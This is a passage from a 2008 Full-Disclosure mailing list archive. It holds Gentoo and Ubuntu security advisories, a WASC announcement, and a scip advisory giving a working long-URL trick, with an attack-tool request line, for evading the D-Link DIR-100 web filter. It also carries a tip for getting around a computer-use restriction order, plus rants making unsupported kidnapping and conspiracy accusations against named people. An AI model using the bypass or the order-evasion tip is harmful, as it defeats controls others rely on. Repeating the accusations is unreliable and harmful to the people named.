he will be able to watch without > his computer-use restriction order being breached. > > Here is a tool that will allow you to do it: > http://www.download.com/YouTube-Downloader/3000-2071_4-10647340.html > > All the best, > > n3td3v > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080908/f8e64837/attachment.html From xploitable at gmail.com Mon Sep 8 07:15:45 2008 From: xploitable at gmail.com (n3td3v) Date: Mon, 8 Sep 2008 07:15:45 +0100 Subject: [Full-disclosure] McKinnon a 'scapegoat for Pentagon insecurity' In-Reply-To: <a741a45f0809072126n3646512budd1adfb65e13474e@mail.gmail.com> References: <4b6ee9310809051636g38329f5elb50c9ca3497683a6@mail.gmail.com> <4b6ee9310809051722w7a27f20dt33951319aed18ddb@mail.gmail.com> <4b6ee9310809061043i7536b628x4fac8077194cd452@mail.gmail.com> <a741a45f0809072126n3646512budd1adfb65e13474e@mail.gmail.com> Message-ID: <4b6ee9310809072315y4ed610a1n8944e53ad87b8a42@mail.gmail.com> On Mon, Sep 8, 2008 at 5:26 AM, Biz Marqee <biz.marqee at gmail.com> wrote: > While I think the US/media is making too much out of this (he was just some > sucker scanning for Adminstrator/NULL and installing pcanywhere) I dont see > why we should care too much, he is a nobody - just some overaged kiddie with > a scanner and some downloaded exez. He didnt use any skill and as best I can > tell (from the media) he didnt access anything interesting except for an > image of a UFO (of which, suprise suprise, he has no proof). > E-mail this to your favorite BBC Radio 1 DJs http://www.bbc.co.uk/radio1/djs/, get it played on the air!!! http://www.h2kradio.com/Method%20-%20Gary%20Mckinnon%20Hacker%20Tribute.mp3 Its by Method, I found it on Youtube http://www.youtube.com/user/methodh2k All the best, n3td3v From maru at scip.ch Mon Sep 8 09:13:44 2008 From: maru at scip.ch (Marc Ruef) Date: Mon, 08 Sep 2008 10:13:44 +0200 Subject: [Full-disclosure] [scip_Advisory 3808] D-Link DIR-100 long url filter evasion Message-ID: <48C4DEB8.9030302@scip.ch> D-Link DIR-100 long url filter evasion scip AG Vulnerability ID 3808 (09/08/2008) http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=3808 I. INTRODUCTION D-Link DIR-100 is a small and cost-effective router and firewall device for small offices and home users. More details are available at the official product web site (German link): http://www.dlink.de/?go=gNTyP9CgrdFOIC4AStFCF834mptYKO9ZTdvhLPG3yV3oV492gqltbNlwaaFp6DQoHDrpxC5H+40AAdvl II. DESCRIPTION Marc Ruef at scip AG found a possibility to evade url filters of the web proxy to prevent access to web sites. An attacker might add a very long string to the url to access web resources althought their access is forbidden. This problem could be verified in all firmware versions up to v1.12. A similar vulnerability was already detected years ago in a similar device Netgear RP114. [1, 2] III. EXPLOITATION It is possible to exploit the vulnerability with a common web browser by using a long url (approx. 1'300 chars). You can expand the length of the url by adding a non-used http get request parameter. Example url: http://www.scip.ch/?foo=aaa(...) A video illustrating this issue is available at the following url: http://de.youtube.com/watch?v=WTzPn37XNl4 The Attack Tool Kit (ATK)[3] is able to exploit this vulnerability with the following generic ASL code (expand the long URL request): open|send GET http://www.scip.ch/?foo=aaa(...) HTTP/1.0\n\n|sleep|close|pattern_not_exists *This URL is <font color=red>blocked</font> by administrator !* IV. IMPACT With this vulnerability users are able to access forbidden web resources without being filtered by the integrated web proxy service. V. DETECTION Detection of web based attacks requires a specialized web proxy and/or intrusion detection system. Patterns for such a detection are available and easy to implement. VI. SOLUTION We have informed D-Link on an early stage. Our technical requests were not answered nor confirmed. Therefore, not official statement, patch or upgrade is available. We suggest the use of another device for filtering forbidden web resources successfully. VII. VENDOR RESPONSE D-Link has been informed first via the unhandy web form at http://www.dlink.com (no public mail address for such cases could be found). The first responses claimed that the problem must be within a wrong configuration setting. Further discussions were initiated. The support was not able to understand the problem. Not even after several step-by-step guides and examples. They always suggest I have to upgrade to the latest firmware and they could not verify the problem. Therefore, no official solution, workaround or patch is available. VIII. SOURCES scip AG - Security Consulting Information Process (german) http://www.scip.ch/ scip AG Vulnerability Database (german) http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=3808 computec.ch document data base (german) http://www.computec.ch/download.php IX. DISCLOSURE TIMELINE 2008/07/25 Identification of the vulnerability by Marc Ruef 2008/07/28 First information to D-Link via web form 2008/07/28 First reply by D-Link support via support at service.dlink.biz (ticket id 1375981) 2008/07/29 Providing our config for further analysis 2008/08/06 Request for actual status (no reply) 2008/08/29 Another request for actual status 2008/08/29 Response could not verify the problem 2008/09/01 Detailed explanation of the exploitation 2008/09/01 Responder could still not understand the problem 2008/09/08 Public disclosure of the advisory X. CREDITS The vulnerability was discovered by Marc Ruef. Marc Ruef, scip AG, Zuerich, Switzerland maru-at-scip.ch http://www.scip.ch/ A1. BIBLIOGRAPHY [1] http://www.securityfocus.com/bid/10404 [2] http://seclists.org/bugtraq/2004/May/0263.html [3] http://www.computec.ch/projekte/atk/ A2. LEGAL NOTICES Copyright (c) 2007-2008 scip AG, Switzerland. Permission is granted for the re-distribution of this alert. It may not be edited in any way without permission of scip AG. The information in the advisory is believed to be accurate at the time of publishing based on currently available information. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect or consequential loss or damage from use of or reliance on this advisory. From xploitable at gmail.com Mon Sep 8 10:59:10 2008 From: xploitable at gmail.com (n3td3v) Date: Mon, 8 Sep 2008 10:59:10 +0100 Subject: [Full-disclosure] Monthly Hands-On Meetups In-Reply-To: <6158bb410809071830w2418cb3aqfbb5b5c34d9572fe@mail.gmail.com> References: <782434a70808311419r7f352b05kaf38c2fdb0ae6306@mail.gmail.com> <6158bb410809071830w2418cb3aqfbb5b5c34d9572fe@mail.gmail.com> Message-ID: <4b6ee9310809080259x6438d80fl9994f511fbcff1a2@mail.gmail.com> On Mon, Sep 8, 2008 at 2:30 AM, Ureleet <ureleet at gmail.com> wrote: > so u just want to meet n3td3v and flogg him publically? sounds good. > I already read a conversation between Joel Esler and his buddies on #pauldotcom that this idea was in the works, accept for them it is a critical mistake, because I saved the IRC transcript to show the police if something does happen offline. Many people from the #pauldotcom channel came to me with the information that was talked about in the #pauldotcom IRC channel, that they were planning something, then this thread appear a couple weeks later, maybe some of these aliases aren't just kids and there are security professionals behind them trying to influence the system to their own advantage. People might be upset with me for speaking out for what I believe in, but Joel Esler, he post a private email I sent to the Sans handlers at sans.org into the ##security IRC channel without permission, then he made a joke about aviation security on a Sans handlers podcast, and then threats to my personal safety made by his friends in #pauldotcom, which was talked about in the public IRC channel in front of 60+ users. What they had forgotten is, n3td3v is well networked in the security community and well dug in, people brought me the information that I was being talked about in #pauldotcom. It wasn't some laze about kids, its a security professionals channel for the pauldotcom.com podcast... they hold some little grudge against me for being so outspoken on Full-Disclosure about whatever I talk about on a particular day. The transcript said they were plotting to trick n3td3v into meeting up with me, and somehow harm me physically and possibly kidnap me to a place where the general public could not see and hear and do something to n3td3v. This was a critical mistake on there part, as n3td3v is well networked and dug in, and things like that get back to me pretty quick, and if they thought I wasn't going to put it on Full-Disclosure about the threat, then they have made a mistake. A picture is building up about Joel Esler and the Sans handlers IRC circle, a very shadowy picture... this may be a joke thread by someone unrelated, nothing to do with n3td3v, but its a bit of a coincidence, but the intelligence picture is building up nicely. I'm in contact with important people and all this information is gathered by people who hang about the same IRC channels as them and the information is sent to me. He thinks Marcus Sachs is innocent, he said he knows Marcus Sachs, he wouldn't do anything like plot a false flag to influence the next administration. I laughed at how young and gullible he sounded trying to stick up for Marcus Sachs when the Youtube video is out there for anyone to watch. The #pauldotcom comments were taken seriously by n3td3v and are currently part of an investigation to make sure the comments stay comments and aren't taken any further into the offline world. The bottom line is, these Sans handlers are power hungry and political, they don't like someone like me getting in the way of their plans to artificially ramp up cyber security as a national security agenda item, as their Sans Internet Storm Center, Director, none other than Marcus Sachs said on Youtube. The Sans Internet Storm Center Director is a twat and there will be no false flags or artificially ramping up cyber security as a national security item on my watch. Each and everytime you try and ramp something up i'll post about it on Full-Disclosure, make sure the public know exactly what is going on with you guys. Arrange a meet up with n3td3v, kidnap me because im getting in the way of your plans, but at least the public will know why n3td3v was kidnapped and harmed, its because you guys had something to do with it. Joel Esler in a private IRC message with me when I questioned him about the #pauldotcom comments, he threatened me if I didn't stop posting on Full-Disclosure that something would happen to me, in the same conversation flow about the #pauldotcom comments meet up plot. I told him, and what are you going to do if I don't stop posting to Full-Disclosure? He never replied. I then said I wasn't going to stop posting to Full-Disclosure, at which point I disconnected from the IRC conversation. They, then banned the nickname "roguebot" from the #pauldotcom that they were paranoid was responsible for the conversation about the meet up with n3td3v plot had been used to get the information back to me. Cause they were paranoid that their channel was springing leaks and giving intelligence to me, they saw roguebot was using mibbit.com and were straight away paranoid about it. I knew threats were going to start happening as soon as I got in the way of their cyber plans, never mind, this e-mail exposes the true nature of the Sans handlers. I'm sure some of the handlers aren't all power hungry and I feel sorry for them getting branded with the same brush, but thats what the rogue elements of the security industry and the ISC storm center have created, im just the messenger reporting about it. Like I said, its not all the Sans handlers, but rogue elements within it, people that have been monitored on IRC by various people and private messages i've had with Joel Esler. Like any organization, there is bad apples inside each. There are bad apples inside Sans as well, plotting there way to get a bigger chunk of the power and money. I used to think, these guys are just Sans handlers, out to post helpful information on their diary, but something far bigger is going on politically and its something thats got to be kept an eye on. It all started one day when I e-mailed them and caused offense and it was later post by Joel Esler on IRC that alarm bells started ringing about the nature of some of the people who volunteer for Sans internet storm center are more sinister under the surface that can be seen on the surface. They will try and say im some kid that forgot to take his meds, but the truth is known by n3td3v, and everyone else who witnessed the comments post on #pauldotcom. Valdis is also part of the same IRC circle with the Sans handlers, so he will probably come trying to support them, as n3td3v believes he is part of the ramping up cyber security thing. They are willing to lock up Gary Mckinnon for 60 years to get power and money, then they are capable of absolutely anything. All the best, n3td3v From majormal at pirate-radio.org Mon Sep 8 10:44:16 2008 From: majormal at pirate-radio.org (Major Malfunction) Date: Mon, 08 Sep 2008 10:44:16 +0100 Subject: [Full-disclosure] DEFCON London - DC4420 - September meet this Thursday 11th Message-ID: <48C4F3F0.5030806@pirate-radio.org> yes, we've recovered enough from the rigours of DC16 to be able to scrape together another London meet, this Thursday, at the Glassblower... http://www.beerintheevening.com/pubs/s/20/2081/Glassblower/Piccadilly as usual, we have our own room with it's own bar (1st floor, with it's own entrance from the street or from the back of the downstairs bar). as well as real ales and wife beater, good food is also available but last food orders are strictly at 21:00, so make sure you get yours in in plenty of time and don't go hungry like i did last time!!! :P meet starts at 19:00, talks at 19:30 this month we have: DEFCON badges - i will go through some of the cool stuff you can do with these, including my own 'tv-be-a.d.d.' hack... i'll also have a couple of human badges to donate to whoever comes up with the coolest potential projects (and promise to come back and demo them!) Merlin's DEFCON experience Tompsci - Windows DLL trampolining ... and anyone else that feels like it on the night. all are welcome, but don't forget we run Fight Club rules... if this is your first night, you *will* talk... ;> cheers, MM -- "In DEFCON, we have no names..." errr... well, we do... but silly ones... From Valdis.Kletnieks at vt.edu Mon Sep 8 16:16:00 2008 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Mon, 08 Sep 2008 11:16:00 -0400 Subject: [Full-disclosure] McKinnon a 'scapegoat for Pentagon insecurity' In-Reply-To: Your message of "Sun, 07 Sep 2008 22:57:11 BST." <4b6ee9310809071457r31d967f2y16116fbccf4a2677@mail.gmail.com> References: <4b6ee9310809051636g38329f5elb50c9ca3497683a6@mail.gmail.com> <4b6ee9310809051722w7a27f20dt33951319aed18ddb@mail.gmail.com> <4b6ee9310809061043i7536b628x4fac8077194cd452@mail.gmail.com> <8a6b8e350809071426ia10f292r2c98ebe74fc398ad@mail.gmail.com> <4b6ee9310809071457r31d967f2y16116fbccf4a2677@mail.gmail.com> Message-ID: <21600.1220886960@turing-police.cc.vt.edu> On Sun, 07 Sep 2008 22:57:11 BST, n3td3v said: > How much will it cost to fly him over to U.S, keep him in prison, > watered and fed? As a percentage of the total US federal government budget, it's merely a grain of sand on the beach. Nobody gives a flying f**k in a rolling donut about one more guy in prison, we've already got several million there already and one more will make a 0.000005% difference in our prison budget. > Is the U.S not already in a recession, have they > really got the money to ramp up somebody's crime to give a false It may come as a surprise, but there are many economically challenged areas in the US that will *welcome* a new prison, because that means jobs for prison guards. If your local unemployment rate is hanging around 10-15% because of a lack of major industry in the area, a prison starts looking pretty good... > impression to the presidency that computer hacking needs to be a > national security agenda for the next administration to worry > about?.... really I don't think hackers are a national security item > for a president to worry about... Good. Now that you've said that, can you please shut the fuck up about cyber warfare, whether it's government sponsored or grassroots movement? For the record, although any single hacking case probably isn't the President's job, unless it's a highly visible one like the McKinnon case, the question of what policies/directives should be issued to deal with the general question *is* the President's job. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080908/4630651b/attachment.bin From kkaawwaa at gmail.com Mon Sep 8 17:38:50 2008 From: kkaawwaa at gmail.com (kkaawwaa at gmail.com) Date: Tue, 09 Sep 2008 01:38:50 +0900 Subject: [Full-disclosure] [funsec] Internet attacks against Georgian web s ites In-Reply-To: <6158bb410809071841y7a5b3e4eqd9545bb608c3bef8@mail.gmail.com> References: <4b6ee9310808281242n27ccee1cx4dabe5621d324ea9@mail.gmail.com> <6158bb410809071841y7a5b3e4eqd9545bb608c3bef8@mail.gmail.com> Message-ID: <20080909013830.B88A.D5B8A56D@gmail.com> Thank you too. On Sun, 7 Sep 2008 21:41:29 -0400 Ureleet <ureleet at gmail.com> wrote: > drink yourself to death. thank you. > > On Thu, Aug 28, 2008 at 3:42 PM, n3td3v <xploitable at gmail.com> wrote: > > On Thu, Aug 28, 2008 at 8:33 PM, n3td3v <xploitable at gmail.com> wrote: > >> Putin blames US for Georgia role > >> > >> Russian Prime Minister Vladimir Putin has accused the US of provoking > >> the conflict in Georgia, possibly for domestic election purposes. > >> > >> Mr Putin told CNN US citizens were "in the area" during the conflict > >> over South Ossetia and were "taking direct orders from their leaders". > >> > >> He said his defence officials had told him the provocation was to > >> benefit one of the US presidential candidates. > >> > >> The White House dismissed the allegations as "not rational". > >> > >> http://news.bbc.co.uk/1/hi/world/europe/7586605.stm > >> > > > > "The suspicion arises that someone in the United States especially > > created this conflict with the aim of making the situation more tense > > and creating a competitive advantage for one of the candidates > > fighting for the post of US president." > > > > White House spokeswoman Dana Perino rejected the allegation. > > > > "To suggest that the United States orchestrated this on behalf of a > > political candidate - it sounds not rational," she said. > > > > http://news.bbc.co.uk/1/hi/world/europe/7586605.stm > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -- <kkaawwaa at gmail.com> From py at gentoo.org Mon Sep 8 18:57:53 2008 From: py at gentoo.org (Pierre-Yves Rofes) Date: Mon, 08 Sep 2008 19:57:53 +0200 Subject: [Full-disclosure] [ GLSA 200809-07 ] libTIFF: User-assisted execution of arbitrary code Message-ID: <48C567A1.3020602@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200809-07 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: libTIFF: User-assisted execution of arbitrary code Date: September 08, 2008 Bugs: #234080 ID: 200809-07 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple buffer underflow vulnerabilities in libTIFF may allow for the remote execution of arbitrary code. Background ========== libTIFF provides support for reading and manipulating TIFF (Tagged Image File Format) images. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 media-libs/tiff < 3.8.2-r4 >= 3.8.2-r4 Description =========== Drew Yao (Apple Product Security) and Clay Wood reported multiple buffer underflows in the LZWDecode() and LZWDecodeCompat() functions in tif_lzw.c when processing TIFF files. Impact ====== A remote attacker could entice a user to open a specially crafted TIFF file with an application making use of libTIFF, possibly resulting in the remote execution of arbitrary code with the privileges of the user running the application. Workaround ========== There is no known workaround at this time. Resolution ========== All libTIFF users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-libs/tiff-3.8.2-r4" References ========== [ 1 ] CVE-2008-2327 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2327 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200809-07.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 260 bytes Desc: OpenPGP digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080908/2d50997d/attachment.bin From py at gentoo.org Mon Sep 8 19:08:57 2008 From: py at gentoo.org (Pierre-Yves Rofes) Date: Mon, 08 Sep 2008 20:08:57 +0200 Subject: [Full-disclosure] [ GLSA 200809-08 ] Amarok: Insecure temporary file creation Message-ID: <48C56A39.5040305@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200809-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Amarok: Insecure temporary file creation Date: September 08, 2008 Bugs: #234689 ID: 200809-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Amarok uses temporary files in an insecure manner, allowing for a symlink attack. Background ========== Amarok is an advanced music player. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 media-sound/amarok < 1.4.10 >= 1.4.10 Description =========== Dwayne Litzenberger reported that the MagnatuneBrowser::listDownloadComplete() function in magnatunebrowser/magnatunebrowser.cpp uses the album_info.xml temporary file in an insecure manner. Impact ====== A local attacker could perform a symlink attack to overwrite arbitrary files on the system with the privileges of the user running the application. Workaround ========== There is no known workaround at this time. Resolution ========== All Amarok users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-sound/amarok-1.4.10" References ========== [ 1 ] CVE-2008-3699 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3699 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200809-08.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 260 bytes Desc: OpenPGP digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080908/e029642e/attachment.bin From tecklord at securitylab.ru Mon Sep 8 20:43:17 2008 From: tecklord at securitylab.ru (Valery Marchuk) Date: Mon, 8 Sep 2008 22:43:17 +0300 Subject: [Full-disclosure] WASC Announcement: 2007 Web Application Security Statistics Published Message-ID: <AE7A8CA5427F43349FD2927AE721D8AC@gw1> The Web Application Security Consortium (WASC) is pleased to announce the WASC Web Application Security Statistics Project 2007. This initiative is a collaborative industry wide effort to pool together sanitized website vulnerability data and to gain a better understanding about the web application vulnerability landscape. Goals 1. Identify the prevalence and probability of different vulnerability classes 2. Compare testing methodologies against what types of vulnerabilities they are likely to identify. The statistics was compiled from web application security assessment projects which were made by the following companies in 2007 (in alphabetic order): - Booz Allen Hamilton - BT - Cenzic with Hailstorm and ClickToSecure - dblogic.it - HP Application Security Center with WebInspect - Positive Technologies with MaxPatrol - Veracode with Veracode Security Review - WhiteHat Security with WhiteHat Sentinel The overall statistics includes analysis results of 32,717 sites and 69,476 vulnerabilities of different degrees of severity. The detailed information can be found here: http://www.webappsec.org/projects/statistics/ If you represent an organization that performs vulnerability assessments on websites, particular in those in custom web applications, through a manual or automated process and would like to participate please let us know. Please contact Sergey Gordeychik (statistics_at_webappsec.org). Regards, - statistics_at_webappsec.org http://www.webappsec.org/ The Web Application Security Consortium From kees at ubuntu.com Tue Sep 9 01:31:49 2008 From: kees at ubuntu.com (Kees Cook) Date: Mon, 8 Sep 2008 17:31:49 -0700 Subject: [Full-disclosure] [USN-641-1] Racoon vulnerabilities Message-ID: <20080909003149.GJ26657@outflux.net> =========================================================== Ubuntu Security Notice USN-641-1 September 09, 2008 ipsec-tools vulnerabilities CVE-2008-3651, CVE-2008-3652 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 7.04 Ubuntu 7.10 Ubuntu 8.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: racoon 1:0.6.5-4ubuntu1.2 Ubuntu 7.04: racoon 1:0.6.6-3ubuntu3.1 Ubuntu 7.10: racoon 1:0.6.6-3.1ubuntu3.1 Ubuntu 8.04 LTS: racoon 1:0.6.7-1.1ubuntu1.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: It was discovered that there were multiple ways to leak memory during the IKE negotiation when handling certain packets. If a remote attacker sent repeated malicious requests, the "racoon" key exchange server could allocate large amounts of memory, possibly leading to a denial of service. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.5-4ubuntu1.2.diff.gz Size/MD5: 47976 6638ae6b7edc7671f77af5b93763de0d http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.5-4ubuntu1.2.dsc Size/MD5: 750 7d87380c510f48a35da9333fbfaf6629 http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.5.orig.tar.gz Size/MD5: 914466 168076243c023782d3fb44a583d4a32c amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.5-4ubuntu1.2_amd64.deb Size/MD5: 89430 2750ab4633d8ae447bed5aa7971aba48 http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.6.5-4ubuntu1.2_amd64.deb Size/MD5: 342540 912a807165c43ce90d3c60cc211ec94b i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.5-4ubuntu1.2_i386.deb Size/MD5: 82876 5958ed679926590d81b53ecf8c651331 http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.6.5-4ubuntu1.2_i386.deb Size/MD5: 311398 ef1a597a39f3ee88292364b037452395 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.5-4ubuntu1.2_powerpc.deb Size/MD5: 91124 e140993179e7d7187574bf971d6773f5 http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.6.5-4ubuntu1.2_powerpc.deb Size/MD5: 336876 9bfa3bb9da23913f4ca6161a0acc602f sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.5-4ubuntu1.2_sparc.deb Size/MD5: 86632 210608ca3d4990fb54566f6d4b3942c8 http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.6.5-4ubuntu1.2_sparc.deb Size/MD5: 316756 ad7f2ccefd4f35cb8aaf5980e53a9499 Updated packages for Ubuntu 7.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.6-3ubuntu3.1.diff.gz Size/MD5: 51311 51c0a08c38483a47bd3b2d8a73e1287f http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.6-3ubuntu3.1.dsc Size/MD5: 848 50817196a867ed407f0c67f928bc2260 http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.6.orig.tar.gz Size/MD5: 914807 643a238e17148d242c603c511e28d029 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.6-3ubuntu3.1_amd64.deb Size/MD5: 91284 1780bae1fe5fdb3b907c39a876a2c419 http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.6.6-3ubuntu3.1_amd64.deb Size/MD5: 345490 cb1610211a35a5a4f8d27b962e67830b i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.6-3ubuntu3.1_i386.deb Size/MD5: 85700 eb95ead40564cd0965a6c256cc29cda4 http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.6.6-3ubuntu3.1_i386.deb Size/MD5: 321292 338faec788865311b18ffe8aa9424ae5 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.6-3ubuntu3.1_powerpc.deb Size/MD5: 95646 0b6ce9437e4255922de2ed241730aa73 http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.6.6-3ubuntu3.1_powerpc.deb Size/MD5: 347712 b7eadf3051881ee5d184aa93e0bc7f8e sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.6-3ubuntu3.1_sparc.deb Size/MD5: 89750 e47a17747bf516f28ba30b71ab762df4 http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.6.6-3ubuntu3.1_sparc.deb Size/MD5: 323440 617461a267909d50f6d0994b03f55688 Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1ubuntu3.1.diff.gz Size/MD5: 54744 118e0b2e21e6fd42e7b153212f9d7847 http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1ubuntu3.1.dsc Size/MD5: 852 754c5e79157f7161d03323206c402c90 http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.6.orig.tar.gz Size/MD5: 914807 643a238e17148d242c603c511e28d029 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1ubuntu3.1_amd64.deb Size/MD5: 91780 cdeda0b4689c7051074ccfbf7757ca5b http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.6.6-3.1ubuntu3.1_amd64.deb Size/MD5: 348172 07a71cb07b5edc9e805c716b6bdc7374 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1ubuntu3.1_i386.deb Size/MD5: 86050 2224517ec375bdf2d55ddeea1afcd8bb http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.6.6-3.1ubuntu3.1_i386.deb Size/MD5: 323010 919ef460216ef536459dd21b50483b07 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1ubuntu3.1_lpia.deb Size/MD5: 86698 cf26821405e282cd0c158bef83ba75ca http://ports.ubuntu.com/pool/main/i/ipsec-tools/racoon_0.6.6-3.1ubuntu3.1_lpia.deb Size/MD5: 323408 878b1d8f4c31dd4139e4ea14e4b9fefc powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1ubuntu3.1_powerpc.deb Size/MD5: 96036 037e835bb80cb35c792dce96168e502f http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.6.6-3.1ubuntu3.1_powerpc.deb Size/MD5: 349582 3d53de0ac8a3fcf27c8a28234c363099 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1ubuntu3.1_sparc.deb Size/MD5: 90208 7e6ae9b61a59731e5edf759da59b6443 http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/racoon_0.6.6-3.1ubuntu3.1_sparc.deb Size/MD5: 325398 ed029d3727b0abb6dfc5718661d3179f Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.7-1.1ubuntu1.1.diff.gz Size/MD5: 263295 c9592c8529b56ee3d6b40a1e3745b4c2 http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.7-1.1ubuntu1.1.dsc Size/MD5: 865 